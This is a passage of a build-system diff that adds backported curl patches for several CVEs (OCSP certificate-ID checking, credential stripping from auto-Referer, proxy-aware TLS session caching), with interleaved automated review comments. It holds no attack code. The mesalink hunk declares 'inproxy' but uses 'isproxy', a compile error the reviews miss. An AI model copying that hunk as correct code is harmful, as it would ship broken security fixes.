+-/* This is called recursively */
+ static CURLcode wc_statemach(struct connectdata *conn)
+ {
+ struct WildcardData * const wildcard = &(conn->data->wildcard);
+ CURLcode result = CURLE_OK;
+
+- switch(wildcard->state) {
+- case CURLWC_INIT:
+- result = init_wc_data(conn);
+- if(wildcard->state == CURLWC_CLEAN)
+- /* only listing! */
+- break;
+- wildcard->state = result ? CURLWC_ERROR : CURLWC_MATCHING;
+- break;
++ for(;;) {
++ switch(wildcard->state) {
++ case CURLWC_INIT:
++ result = init_wc_data(conn);
++ if(wildcard->state == CURLWC_CLEAN)
++ /* only listing! */
++ return result;
++ wildcard->state = result ? CURLWC_ERROR : CURLWC_MATCHING;
++ return result;
+
+- case CURLWC_MATCHING: {
+- /* In this state is LIST response successfully parsed, so lets restore
+- previous WRITEFUNCTION callback and WRITEDATA pointer */
+- struct ftp_wc *ftpwc = wildcard->protdata;
+- conn->data->set.fwrite_func = ftpwc->backup.write_function;
+- conn->data->set.out = ftpwc->backup.file_descriptor;
+- ftpwc->backup.write_function = ZERO_NULL;
+- ftpwc->backup.file_descriptor = NULL;
+- wildcard->state = CURLWC_DOWNLOADING;
+-
+- if(Curl_ftp_parselist_geterror(ftpwc->parser)) {
+- /* error found in LIST parsing */
+- wildcard->state = CURLWC_CLEAN;
+- return wc_statemach(conn);
+- }
+- if(wildcard->filelist.size == 0) {
+- /* no corresponding file */
+- wildcard->state = CURLWC_CLEAN;
+- return CURLE_REMOTE_FILE_NOT_FOUND;
++ case CURLWC_MATCHING: {
++ /* In this state is LIST response successfully parsed, so lets restore
++ previous WRITEFUNCTION callback and WRITEDATA pointer */
++ struct ftp_wc *ftpwc = wildcard->protdata;
++ conn->data->set.fwrite_func = ftpwc->backup.write_function;
++ conn->data->set.out = ftpwc->backup.file_descriptor;
++ ftpwc->backup.write_function = ZERO_NULL;
++ ftpwc->backup.file_descriptor = NULL;
++ wildcard->state = CURLWC_DOWNLOADING;
++
++ if(Curl_ftp_parselist_geterror(ftpwc->parser)) {
++ /* error found in LIST parsing */
++ wildcard->state = CURLWC_CLEAN;
++ continue;
++ }
++ if(wildcard->filelist.size == 0) {
++ /* no corresponding file */
++ wildcard->state = CURLWC_CLEAN;
++ return CURLE_REMOTE_FILE_NOT_FOUND;
++ }
++ continue;
+ }
+- return wc_statemach(conn);
+- }
+
+- case CURLWC_DOWNLOADING: {
+- /* filelist has at least one file, lets get first one */
+- struct ftp_conn *ftpc = &conn->proto.ftpc;
+- struct curl_fileinfo *finfo = wildcard->filelist.head->ptr;
+- struct FTP *ftp = conn->data->req.protop;
++ case CURLWC_DOWNLOADING: {
++ /* filelist has at least one file, lets get first one */
++ struct ftp_conn *ftpc = &conn->proto.ftpc;
++ struct curl_fileinfo *finfo = wildcard->filelist.head->ptr;
++ struct FTP *ftp = conn->data->req.protop;
+
+- char *tmp_path = aprintf("%s%s", wildcard->path, finfo->filename);
+- if(!tmp_path)
+- return CURLE_OUT_OF_MEMORY;
++ char *tmp_path = aprintf("%s%s", wildcard->path, finfo->filename);
++ if(!tmp_path)
++ return CURLE_OUT_OF_MEMORY;
+
+- /* switch default ftp->path and tmp_path */
+- free(ftp->pathalloc);
+- ftp->pathalloc = ftp->path = tmp_path;
+-
+- infof(conn->data, "Wildcard - START of \"%s\"\n", finfo->filename);
+- if(conn->data->set.chunk_bgn) {
+- long userresponse;
+- Curl_set_in_callback(conn->data, true);
+- userresponse = conn->data->set.chunk_bgn(
+- finfo, wildcard->customptr, (int)wildcard->filelist.size);
+- Curl_set_in_callback(conn->data, false);
+- switch(userresponse) {
+- case CURL_CHUNK_BGN_FUNC_SKIP:
+- infof(conn->data, "Wildcard - \"%s\" skipped by user\n",
+- finfo->filename);
+- wildcard->state = CURLWC_SKIP;
+- return wc_statemach(conn);
+- case CURL_CHUNK_BGN_FUNC_FAIL:
+- return CURLE_CHUNK_FAILED;
++ /* switch default ftp->path and tmp_path */
++ free(ftp->pathalloc);
++ ftp->pathalloc = ftp->path = tmp_path;
++
++ infof(conn->data, "Wildcard - START of \"%s\"\n", finfo->filename);
++ if(conn->data->set.chunk_bgn) {
++ long userresponse;
++ Curl_set_in_callback(conn->data, true);
++ userresponse = conn->data->set.chunk_bgn(
++ finfo, wildcard->customptr, (int)wildcard->filelist.size);
++ Curl_set_in_callback(conn->data, false);
++ switch(userresponse) {
++ case CURL_CHUNK_BGN_FUNC_SKIP:
++ infof(conn->data, "Wildcard - \"%s\" skipped by user\n",
++ finfo->filename);
++ wildcard->state = CURLWC_SKIP;
++ continue;
++ case CURL_CHUNK_BGN_FUNC_FAIL:
++ return CURLE_CHUNK_FAILED;
++ }
+ }
+- }
+
+- if(finfo->filetype != CURLFILETYPE_FILE) {
+- wildcard->state = CURLWC_SKIP;
+- return wc_statemach(conn);
+- }
++ if(finfo->filetype != CURLFILETYPE_FILE) {
++ wildcard->state = CURLWC_SKIP;
++ continue;
++ }
+
+- if(finfo->flags & CURLFINFOFLAG_KNOWN_SIZE)
+- ftpc->known_filesize = finfo->size;
++ if(finfo->flags & CURLFINFOFLAG_KNOWN_SIZE)
++ ftpc->known_filesize = finfo->size;
+
+- result = ftp_parse_url_path(conn);
+- if(result)
+- return result;
++ result = ftp_parse_url_path(conn);
++ if(result)
++ return result;
+
+- /* we don't need the Curl_fileinfo of first file anymore */
+- Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
++ /* we don't need the Curl_fileinfo of first file anymore */
++ Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
+
+- if(wildcard->filelist.size == 0) { /* remains only one file to down. */
+- wildcard->state = CURLWC_CLEAN;
+- /* after that will be ftp_do called once again and no transfer
+- will be done because of CURLWC_CLEAN state */
+- return CURLE_OK;
++ if(wildcard->filelist.size == 0) { /* remains only one file to down. */
++ wildcard->state = CURLWC_CLEAN;
++ /* after that will be ftp_do called once again and no transfer
++ will be done because of CURLWC_CLEAN state */
++ return CURLE_OK;
++ }
++ return result;
+ }
+- } break;
+
+- case CURLWC_SKIP: {
+- if(conn->data->set.chunk_end) {
+- Curl_set_in_callback(conn->data, true);
+- conn->data->set.chunk_end(conn->data->wildcard.customptr);
+- Curl_set_in_callback(conn->data, false);
++ case CURLWC_SKIP: {
++ if(conn->data->set.chunk_end) {
++ Curl_set_in_callback(conn->data, true);
++ conn->data->set.chunk_end(conn->data->wildcard.customptr);
++ Curl_set_in_callback(conn->data, false);
++ }
++ Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
++ wildcard->state = (wildcard->filelist.size == 0) ?
++ CURLWC_CLEAN : CURLWC_DOWNLOADING;
++ continue;
+ }
+- Curl_llist_remove(&wildcard->filelist, wildcard->filelist.head, NULL);
+- wildcard->state = (wildcard->filelist.size == 0) ?
+- CURLWC_CLEAN : CURLWC_DOWNLOADING;
+- return wc_statemach(conn);
+- }
+
+- case CURLWC_CLEAN: {
+- struct ftp_wc *ftpwc = wildcard->protdata;
+- result = CURLE_OK;
+- if(ftpwc)
+- result = Curl_ftp_parselist_geterror(ftpwc->parser);
++ case CURLWC_CLEAN: {
++ struct ftp_wc *ftpwc = wildcard->protdata;
++ result = CURLE_OK;
++ if(ftpwc)
++ result = Curl_ftp_parselist_geterror(ftpwc->parser);
+
+- wildcard->state = result ? CURLWC_ERROR : CURLWC_DONE;
+- } break;
++ wildcard->state = result ? CURLWC_ERROR : CURLWC_DONE;
++ return result;
++ }
+
+- case CURLWC_DONE:
+- case CURLWC_ERROR:
+- case CURLWC_CLEAR:
+- if(wildcard->dtor)
+- wildcard->dtor(wildcard->protdata);
+- break;
++ case CURLWC_DONE:
++ case CURLWC_ERROR:
++ case CURLWC_CLEAR:
++ if(wildcard->dtor)
++ wildcard->dtor(wildcard->protdata);
++ return result;
++ }
+ }
+-
+- return result;
++ /* UNREACHABLE */
+ }
+
+ /***********************************************************************
+--
+2.26.2
+
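Review bot: The rewritten `wc_statemach` puts `switch(wildcard->state)` inside `for(;;)` with no `default:` label, so a state value outside the listed cases would spin forever, where the old code fell out of the switch and returned `result`. Every case in the hunk ends in `return` or `continue`, so this is reachable only if the state enum has or later gains a value not handled here, and the hunk does not show the enum. Adding `default: return result;` before the switch's closing brace would keep the old fall-through behaviour; as that deviates from the upstream commit, it should be mentioned in the patch header. The removed `/* This is called recursively */` comment also has no replacement, and a line such as `/* loops until a state returns to the caller; 'continue' re-dispatches on the new state */` above the function would document the new control flow.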
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8286.patch b/meta/recipes-support/curl/curl/CVE-2020-8286.patch
new file mode 100644
index 0000000000..093562fe01
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8286.patch
@@ -0,0 +1,133 @@
+From 43d1163b3730f715704240f7f6d31af289246873 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Wed, 2 Dec 2020 23:01:11 +0100
+Subject: [PATCH] openssl: make the OCSP verification verify the certificate id
+
+CVE-2020-8286
+
+Reported by anonymous
+
+Bug: https://curl.se/docs/CVE-2020-8286.html
+
+Upstream-commit: d9d01672785b8ac04aab1abb6de95fe3072ae199
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+
+Upstream-Status: Backport [import from fedora https://koji.fedoraproject.org/koji/fileinfo?rpmID=24270817&filename=0007-curl-7.71.1-CVE-2020-8286.patch ]
+CVE: CVE-2020-8286
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/vtls/openssl.c | 83 ++++++++++++++++++++++++++++++----------------
+ 1 file changed, 54 insertions(+), 29 deletions(-)
+
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 1d09cad..bcfd83b 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -1717,6 +1717,11 @@ static CURLcode verifystatus(struct connectdata *conn,
+ OCSP_BASICRESP *br = NULL;
+ X509_STORE *st = NULL;
+ STACK_OF(X509) *ch = NULL;
++ X509 *cert;
++ OCSP_CERTID *id = NULL;
++ int cert_status, crl_reason;
++ ASN1_GENERALIZEDTIME *rev, *thisupd, *nextupd;
++ int ret;
+
+ long len = SSL_get_tlsext_status_ocsp_resp(BACKEND->handle, &status);
+
+@@ -1785,43 +1790,63 @@ static CURLcode verifystatus(struct connectdata *conn,
+ goto end;
+ }
+
+- for(i = 0; i < OCSP_resp_count(br); i++) {
+- int cert_status, crl_reason;
+- OCSP_SINGLERESP *single = NULL;
+-
+- ASN1_GENERALIZEDTIME *rev, *thisupd, *nextupd;
++ /* Compute the certificate's ID */
++ cert = SSL_get_peer_certificate(BACKEND->handle);
++ if(!cert) {
++ failf(data, "Error getting peer certficate");
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
++ }
+
+- single = OCSP_resp_get0(br, i);
+- if(!single)
+- continue;
++ for(i = 0; i < sk_X509_num(ch); i++) {
++ X509 *issuer = sk_X509_value(ch, i);
++ if(X509_check_issued(issuer, cert) == X509_V_OK) {
++ id = OCSP_cert_to_id(EVP_sha1(), cert, issuer);
++ break;
++ }
++ }
++ X509_free(cert);
+
+- cert_status = OCSP_single_get0_status(single, &crl_reason, &rev,
+- &thisupd, &nextupd);
++ if(!id) {
++ failf(data, "Error computing OCSP ID");
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
++ }
+
+- if(!OCSP_check_validity(thisupd, nextupd, 300L, -1L)) {
+- failf(data, "OCSP response has expired");
+- result = CURLE_SSL_INVALIDCERTSTATUS;
+- goto end;
+- }
++ /* Find the single OCSP response corresponding to the certificate ID */
++ ret = OCSP_resp_find_status(br, id, &cert_status, &crl_reason, &rev,
++ &thisupd, &nextupd);
++ OCSP_CERTID_free(id);
++ if(ret != 1) {
++ failf(data, "Could not find certificate ID in OCSP response");
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
++ }
+
+- infof(data, "SSL certificate status: %s (%d)\n",
+- OCSP_cert_status_str(cert_status), cert_status);
++ /* Validate the corresponding single OCSP response */
++ if(!OCSP_check_validity(thisupd, nextupd, 300L, -1L)) {
++ failf(data, "OCSP response has expired");
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
++ }
+
+- switch(cert_status) {
+- case V_OCSP_CERTSTATUS_GOOD:
+- break;
++ infof(data, "SSL certificate status: %s (%d)\n",
++ OCSP_cert_status_str(cert_status), cert_status);
+
+- case V_OCSP_CERTSTATUS_REVOKED:
+- result = CURLE_SSL_INVALIDCERTSTATUS;
++ switch(cert_status) {
++ case V_OCSP_CERTSTATUS_GOOD:
++ break;
+
+- failf(data, "SSL certificate revocation reason: %s (%d)",
+- OCSP_crl_reason_str(crl_reason), crl_reason);
+- goto end;
++ case V_OCSP_CERTSTATUS_REVOKED:
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ failf(data, "SSL certificate revocation reason: %s (%d)",
++ OCSP_crl_reason_str(crl_reason), crl_reason);
++ goto end;
+
+- case V_OCSP_CERTSTATUS_UNKNOWN:
+- result = CURLE_SSL_INVALIDCERTSTATUS;
+- goto end;
+- }
++ case V_OCSP_CERTSTATUS_UNKNOWN:
++ default:
++ result = CURLE_SSL_INVALIDCERTSTATUS;
++ goto end;
+ }
+
+ end:
+--
+2.26.2
+
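Review bot: The certificate ID in the new `verifystatus()` code is built with SHA-1 only, `id = OCSP_cert_to_id(EVP_sha1(), cert, issuer);`. A stapled response whose CertID uses a different digest would presumably not be matched by `OCSP_resp_find_status()`, and the handshake then ends with "Could not find certificate ID in OCSP response". That is fail-closed, but it deserves a comment above the call, for example `/* CertIDs in the response are assumed to use SHA-1; anything else is rejected */`. The new message `"Error getting peer certficate"` also misspells "certificate". `verifystatus()` starts and ends outside the inner hunks, so the assignment of `ch` and the `end:` cleanup are not visible here.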
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22876.patch b/meta/recipes-support/curl/curl/CVE-2021-22876.patch
new file mode 100644
index 0000000000..fc396aabef
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22876.patch
@@ -0,0 +1,59 @@
+transfer: strip credentials from the auto-referer header field
+
+CVE-2021-22876
+
+Patch taken from Ubuntu curl 7.68.0-1ubuntu2.5.
+
+Bug: https://curl.se/docs/CVE-2021-22876.html
+Upstream-Status: backport
+---
+ lib/transfer.c | 25 +++++++++++++++++++++++--
+ 1 file changed, 23 insertions(+), 2 deletions(-)
+
+diff --git a/lib/transfer.c b/lib/transfer.c
+index e76834eb3..744e1c00b 100644
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1570,6 +1570,9 @@ CURLcode Curl_follow(struct Curl_easy *data,
+ data->set.followlocation++; /* count location-followers */
+
+ if(data->set.http_auto_referer) {
++ CURLU *u;
++ char *referer;
++
+ /* We are asked to automatically set the previous URL as the referer
+ when we get the next URL. We pick the ->url field, which may or may
+ not be 100% correct */
+@@ -1579,9 +1582,27 @@ CURLcode Curl_follow(struct Curl_easy *data,
+ data->change.referer_alloc = FALSE;
+ }
+
+- data->change.referer = strdup(data->change.url);
+- if(!data->change.referer)
++ /* Make a copy of the URL without crenditals and fragment */
++ u = curl_url();
++ if(!u)
++ return CURLE_OUT_OF_MEMORY;
++
++ uc = curl_url_set(u, CURLUPART_URL, data->change.url, 0);
++ if(!uc)
++ uc = curl_url_set(u, CURLUPART_FRAGMENT, NULL, 0);
++ if(!uc)
++ uc = curl_url_set(u, CURLUPART_USER, NULL, 0);
++ if(!uc)
++ uc = curl_url_set(u, CURLUPART_PASSWORD, NULL, 0);
++ if(!uc)
++ uc = curl_url_get(u, CURLUPART_URL, &referer, 0);
++
++ curl_url_cleanup(u);
++
++ if(uc || referer == NULL)
+ return CURLE_OUT_OF_MEMORY;
++
++ data->change.referer = referer;
+ data->change.referer_alloc = TRUE; /* yes, free this later */
+ }
+ }
+--
+2.20.1
+
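Review bot: Every failure in the `curl_url_set()`/`curl_url_get()` chain in `Curl_follow()` is returned as `CURLE_OUT_OF_MEMORY` through `if(uc || referer == NULL)`. A previous URL that the parser rejects is therefore reported as an allocation failure. Splitting the check would keep the diagnosis honest: `if(uc) return (uc == CURLUE_OUT_OF_MEMORY) ? CURLE_OUT_OF_MEMORY : CURLE_URL_MALFORMAT;` followed by `if(!referer) return CURLE_OUT_OF_MEMORY;`. `uc` is not declared in either inner hunk, so it is presumably declared earlier in the function, which starts outside the hunk. The comment "without crenditals and fragment" should read "credentials", and the header has no `CVE:` tag line, unlike CVE-2020-8286.patch and CVE-2021-22898.patch on this page.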
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22890.patch b/meta/recipes-support/curl/curl/CVE-2021-22890.patch
new file mode 100644
index 0000000000..8c0ecbfe7f
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22890.patch
@@ -0,0 +1,464 @@
+vtls: add 'isproxy' argument to Curl_ssl_get/addsessionid()
+
+To make sure we set and extract the correct session.
+
+Patch taken from Ubuntu curl 7.68.0-1ubuntu2.5.
+
+CVE-2021-22890
+
+Reported-by: Mingtao Yang
+Bug: https://curl.se/docs/CVE-2021-22890.html
+Upstream-Status: backport
+---
+ lib/vtls/bearssl.c | 9 +++++---
+ lib/vtls/gtls.c | 9 +++++---
+ lib/vtls/mbedtls.c | 8 ++++---
+ lib/vtls/mesalink.c | 9 +++++---
+ lib/vtls/openssl.c | 52 ++++++++++++++++++++++++++++++++++----------
+ lib/vtls/schannel.c | 10 +++++----
+ lib/vtls/sectransp.c | 9 ++++----
+ lib/vtls/vtls.c | 9 ++++++--
+ lib/vtls/vtls.h | 2 ++
+ lib/vtls/wolfssl.c | 8 ++++---
+ 10 files changed, 88 insertions(+), 37 deletions(-)
+
+diff --git a/lib/vtls/bearssl.c b/lib/vtls/bearssl.c
+index 67f945831..32cb0a4c2 100644
+--- a/lib/vtls/bearssl.c
++++ b/lib/vtls/bearssl.c
+@@ -372,7 +372,8 @@ static CURLcode bearssl_connect_step1(struct connectdata *conn, int sockindex)
+ void *session;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &session, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &session, NULL, sockindex)) {
+ br_ssl_engine_set_session_parameters(&BACKEND->ctx.eng, session);
+ infof(data, "BearSSL: re-using session ID\n");
+ }
+@@ -560,10 +561,12 @@ static CURLcode bearssl_connect_step3(struct connectdata *conn, int sockindex)
+ return CURLE_OUT_OF_MEMORY;
+ br_ssl_engine_get_session_parameters(&BACKEND->ctx.eng, session);
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &oldsession, NULL, sockindex));
++ incache = !(Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &oldsession, NULL, sockindex));
+ if(incache)
+ Curl_ssl_delsessionid(conn, oldsession);
+- ret = Curl_ssl_addsessionid(conn, session, 0, sockindex);
++ ret = Curl_ssl_addsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ session, 0, sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(ret) {
+ free(session);
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 5f740eeba..46e149c7d 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -937,7 +937,8 @@ gtls_connect_step1(struct connectdata *conn,
+ size_t ssl_idsize;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, &ssl_idsize, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, &ssl_idsize, sockindex)) {
+ /* we got a session id, use it! */
+ gnutls_session_set_data(session, ssl_sessionid, ssl_idsize);
+
+@@ -1485,7 +1486,8 @@ gtls_connect_step3(struct connectdata *conn,
+ gnutls_session_get_data(session, connect_sessionid, &connect_idsize);
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL,
++ incache = !(Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL,
+ sockindex));
+ if(incache) {
+ /* there was one before in the cache, so instead of risking that the
+@@ -1494,7 +1496,8 @@ gtls_connect_step3(struct connectdata *conn,
+ }
+
+ /* store this session id */
+- result = Curl_ssl_addsessionid(conn, connect_sessionid, connect_idsize,
++ result = Curl_ssl_addsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ connect_sessionid, connect_idsize,
+ sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(result) {
+diff --git a/lib/vtls/mbedtls.c b/lib/vtls/mbedtls.c
+index f057315f3..19df8478e 100644
+--- a/lib/vtls/mbedtls.c
++++ b/lib/vtls/mbedtls.c
+@@ -453,7 +453,8 @@ mbed_connect_step1(struct connectdata *conn,
+ void *old_session = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &old_session, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &old_session, NULL, sockindex)) {
+ ret = mbedtls_ssl_set_session(&BACKEND->ssl, old_session);
+ if(ret) {
+ Curl_ssl_sessionid_unlock(conn);
+@@ -709,6 +710,7 @@ mbed_connect_step3(struct connectdata *conn,
+ int ret;
+ mbedtls_ssl_session *our_ssl_sessionid;
+ void *old_ssl_sessionid = NULL;
++ bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+
+ our_ssl_sessionid = malloc(sizeof(mbedtls_ssl_session));
+ if(!our_ssl_sessionid)
+@@ -727,10 +729,10 @@ mbed_connect_step3(struct connectdata *conn,
+
+ /* If there's already a matching session in the cache, delete it */
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL, sockindex))
++ if(!Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid, NULL, sockindex))
+ Curl_ssl_delsessionid(conn, old_ssl_sessionid);
+
+- retcode = Curl_ssl_addsessionid(conn, our_ssl_sessionid, 0, sockindex);
++ retcode = Curl_ssl_addsessionid(conn, isproxy, our_ssl_sessionid, 0, sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(retcode) {
+ mbedtls_ssl_session_free(our_ssl_sessionid);
+diff --git a/lib/vtls/mesalink.c b/lib/vtls/mesalink.c
+index cab1e390b..79d1e3dfa 100644
+--- a/lib/vtls/mesalink.c
++++ b/lib/vtls/mesalink.c
+@@ -263,7 +263,8 @@ mesalink_connect_step1(struct connectdata *conn, int sockindex)
+ void *ssl_sessionid = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL, sockindex)) {
+ /* we got a session id, use it! */
+ if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+ Curl_ssl_sessionid_unlock(conn);
+@@ -347,12 +348,14 @@ mesalink_connect_step3(struct connectdata *conn, int sockindex)
+ bool incache;
+ SSL_SESSION *our_ssl_sessionid;
+ void *old_ssl_sessionid = NULL;
++ bool inproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+
+ our_ssl_sessionid = SSL_get_session(BACKEND->handle);
+
+ Curl_ssl_sessionid_lock(conn);
+ incache =
+- !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL, sockindex));
++ !(Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid,
++ NULL, sockindex));
+ if(incache) {
+ if(old_ssl_sessionid != our_ssl_sessionid) {
+ infof(data, "old SSL session ID is stale, removing\n");
+@@ -363,7 +366,7 @@ mesalink_connect_step3(struct connectdata *conn, int sockindex)
+
+ if(!incache) {
+ result = Curl_ssl_addsessionid(
+- conn, our_ssl_sessionid, 0 /* unknown size */, sockindex);
++ conn, isproxy, our_ssl_sessionid, 0 /* unknown size */, sockindex);
+ if(result) {
+ Curl_ssl_sessionid_unlock(conn);
+ failf(data, "failed to store ssl session");
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 1d09cadca..64f43605a 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -422,12 +422,23 @@ static int ossl_get_ssl_conn_index(void)
+ */
+ static int ossl_get_ssl_sockindex_index(void)
+ {
+- static int ssl_ex_data_sockindex_index = -1;
+- if(ssl_ex_data_sockindex_index < 0) {
+- ssl_ex_data_sockindex_index = SSL_get_ex_new_index(0, NULL, NULL, NULL,
+- NULL);
++ static int sockindex_index = -1;
++ if(sockindex_index < 0) {
++ sockindex_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
+ }
+- return ssl_ex_data_sockindex_index;
++ return sockindex_index;
++}
++
++/* Return an extra data index for proxy boolean.
++ * This index can be used with SSL_get_ex_data() and SSL_set_ex_data().
++ */
++static int ossl_get_proxy_index(void)
++{
++ static int proxy_index = -1;
++ if(proxy_index < 0) {
++ proxy_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
++ }
++ return proxy_index;
+ }
+
+ static int passwd_callback(char *buf, int num, int encrypting,
+@@ -1079,7 +1090,8 @@ static int Curl_ossl_init(void)
+ #endif
+
+ /* Initialize the extra data indexes */
+- if(ossl_get_ssl_conn_index() < 0 || ossl_get_ssl_sockindex_index() < 0)
++ if(ossl_get_ssl_conn_index() < 0 || ossl_get_ssl_sockindex_index() < 0 ||
++ ossl_get_proxy_index() < 0)
+ return 0;
+
+ return 1;
+@@ -2341,8 +2353,10 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+ curl_socket_t *sockindex_ptr;
+ int connectdata_idx = ossl_get_ssl_conn_index();
+ int sockindex_idx = ossl_get_ssl_sockindex_index();
++ int proxy_idx = ossl_get_proxy_index();
++ bool isproxy;
+
+- if(connectdata_idx < 0 || sockindex_idx < 0)
++ if(connectdata_idx < 0 || sockindex_idx < 0 || proxy_idx < 0)
+ return 0;
+
+ conn = (struct connectdata*) SSL_get_ex_data(ssl, connectdata_idx);
+@@ -2355,13 +2369,18 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+ sockindex_ptr = (curl_socket_t*) SSL_get_ex_data(ssl, sockindex_idx);
+ sockindex = (int)(sockindex_ptr - conn->sock);
+
++ isproxy = SSL_get_ex_data(ssl, proxy_idx) ? TRUE : FALSE;
++
+ if(SSL_SET_OPTION(primary.sessionid)) {
+ bool incache;
+ void *old_ssl_sessionid = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL,
+- sockindex));
++ if(isproxy)
++ incache = FALSE;
++ else
++ incache = !(Curl_ssl_getsessionid(conn, isproxy,
++ &old_ssl_sessionid, NULL, sockindex));
+ if(incache) {
+ if(old_ssl_sessionid != ssl_sessionid) {
+ infof(data, "old SSL session ID is stale, removing\n");
+@@ -2371,7 +2390,7 @@ static int ossl_new_session_cb(SSL *ssl, SSL_SESSION *ssl_sessionid)
+ }
+
+ if(!incache) {
+- if(!Curl_ssl_addsessionid(conn, ssl_sessionid,
++ if(!Curl_ssl_addsessionid(conn, isproxy, ssl_sessionid,
+ 0 /* unknown size */, sockindex)) {
+ /* the session has been put into the session cache */
+ res = 1;
+@@ -2868,16 +2887,25 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ void *ssl_sessionid = NULL;
+ int connectdata_idx = ossl_get_ssl_conn_index();
+ int sockindex_idx = ossl_get_ssl_sockindex_index();
++ int proxy_idx = ossl_get_proxy_index();
+
+- if(connectdata_idx >= 0 && sockindex_idx >= 0) {
++ if(connectdata_idx >= 0 && sockindex_idx >= 0 && proxy_idx >= 0) {
+ /* Store the data needed for the "new session" callback.
+ * The sockindex is stored as a pointer to an array element. */
+ SSL_set_ex_data(BACKEND->handle, connectdata_idx, conn);
+ SSL_set_ex_data(BACKEND->handle, sockindex_idx, conn->sock + sockindex);
++#ifndef CURL_DISABLE_PROXY
++ SSL_set_ex_data(BACKEND->handle, proxy_idx, SSL_IS_PROXY() ? (void *) 1:
++ NULL);
++#else
++ SSL_set_ex_data(BACKEND->handle, proxy_idx, NULL);
++#endif
++
+ }
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL, sockindex)) {
+ /* we got a session id, use it! */
+ if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+ Curl_ssl_sessionid_unlock(conn);
+diff --git a/lib/vtls/schannel.c b/lib/vtls/schannel.c
+index f665ee340..a354ce95d 100644
+--- a/lib/vtls/schannel.c
++++ b/lib/vtls/schannel.c
+@@ -487,7 +487,8 @@ schannel_connect_step1(struct connectdata *conn, int sockindex)
+ /* check for an existing re-usable credential handle */
+ if(SSL_SET_OPTION(primary.sessionid)) {
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, (void **)&old_cred, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ (void **)&old_cred, NULL, sockindex)) {
+ BACKEND->cred = old_cred;
+ DEBUGF(infof(data, "schannel: re-using existing credential handle\n"));
+
+@@ -1193,8 +1194,9 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
